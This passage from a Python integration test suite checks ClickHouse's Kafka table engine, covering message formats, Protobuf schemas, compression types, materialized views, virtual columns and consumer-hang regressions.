# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if the format supports an empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
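# Illustrative sketch (not used by the test above): the expected block for the generic
# format check could also be built programmatically. The helper name and layout below
# are assumptions made purely for illustration.
def _build_expected_format_rows(topic_name, offsets):
    # one row for id 0 from the first sample message; ids 1..15 from the second sample
    # share a single Kafka offset because they arrive in one message; then id 0 again
    # from the third sample; the partition is always 0
    rows = ['0\t0\tAM\t0.5\t1\t{}\t0\t{}'.format(topic_name, offsets[0])]
    rows += ['{}\t0\tAM\t0.5\t1\t{}\t0\t{}'.format(i, topic_name, offsets[1]) for i in range(1, 16)]
    rows.append('0\t0\tAM\t0.5\t1\t{}\t0\t{}'.format(topic_name, offsets[2]))
    return '\n'.join(rows) + '\n'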
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
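# Sketch for the nested-JSON mapping exercised above (illustration only; the helper
# name is hypothetical and not used by the test): with input_format_import_nested_json = 1
# a payload like {"t": 123, "e": {"x": "woof"}} is read into the columns
# (t UInt64, `e.x` String), which the materialized view then renames to (time, some_string).
def _issue11308_payload(t, x):
    # mirrors the shape of the messages produced in test_kafka_issue11308
    return json.dumps({'t': t, 'e': {'x': x}})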
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter works now that it is passed as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
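# Sketch (illustration only; the helper name is an assumption): the CSV samples above use
# '|' as the column delimiter, and a single Kafka message may carry several rows separated
# by '\n'. For example, _pipe_csv_rows([(100, 'multi'), (101, 'row'), (103, 'message')])
# reproduces the last message produced in test_kafka_issue4116.
def _pipe_csv_rows(pairs, delimiter='|'):
    # one Kafka message containing one CSV row per (a, b) pair
    return '\n'.join('{}{}{}'.format(a, delimiter, b) for a, b in pairs)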
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# The original problem appeared as a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback.
# From a user perspective: we expect no hanging 'drop' queries.
# 'dr'||'op' is used so that the check does not match its own query text.
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
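# Note on the 'dr'||'op' concatenation used in the assertion above: searching
# system.processes for the literal substring 'drop' would match the monitoring query
# itself, so the pattern is split in the query text and re-assembled server side.
# A reusable variant could look like this (sketch; the helper name is an assumption):
def _count_hanging_drop_queries(node):
    # counts currently running queries whose text contains 'drop' (case-insensitive)
    return int(node.query(
        "select count() from system.processes where position(lower(query),'dr'||'op')>0"))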
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
    # The first consumer subscribes to the topic, tries to poll some data, and goes to rest.
instance.query('SELECT * FROM test.kafka')
    # The second consumer does the same, leading to a rebalance in the first
    # consumer; try to poll some data.
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
    # The first consumer has an unprocessed pending rebalance callback (no poll after the select).
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
    # From a user perspective: we expect no hanging 'drop' queries.
    # 'dr'||'op' is concatenated so the monitoring query does not match itself.
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
    Regression test for UB in snappy-c (which is used in librdkafka);
    the backport PR is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
    To trigger this regression there should be duplicated messages.
    Original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
        print('Check compression {}'.format(compression_type))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': 'localhost:9092'})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
    # Create batches of messages of size ~100 KB.
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
